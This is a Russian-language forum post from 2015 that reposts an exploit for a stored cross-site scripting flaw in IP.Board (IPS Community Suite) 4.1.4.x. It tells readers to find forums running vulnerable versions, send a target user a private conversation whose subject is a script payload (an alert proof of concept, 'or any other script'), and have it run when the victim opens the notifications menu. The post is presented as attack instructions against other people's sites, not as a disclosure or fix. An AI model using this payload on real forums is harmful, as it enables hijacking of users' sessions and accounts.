Загрузка...

IP.Board 4.1.4.x - XSS Vulnerability

Thread in Web vulnerabilities created by RaysMorgan Dec 13, 2015. 3425 views

RaysMorgan Topic starter Dec 13, 2015 Че скажете 54,006 Mar 7, 2013
IPS Community Suite 4.1.4.x XSS уязвимость

# Exploit Title: IP.Board 4.X Stored XSS

# Date: 27-08-2015

# Software Link: https://www.invisionpower.com/

# Exploit Author: snop.

# Contact: http://twitter.com/rabbitz_org

# Website: http://rabbitz.org

# Category: webapps
Click to expand...

Ищем форумы версии IPS меньше или 4.1.4.x
Пишем смс (conversations/) нужному пользователю, в тему письма пишем:

<script>alert(1)</script>

Code

<script>alert(1)</script>

Ну или любой другой скрипт. Когда пользователь откроет меню с оповещениями, этот скрипт выполнится у него на странице.
Dec 13, 2015 Edited

You must log in or sign up to reply here.

Loading...

Top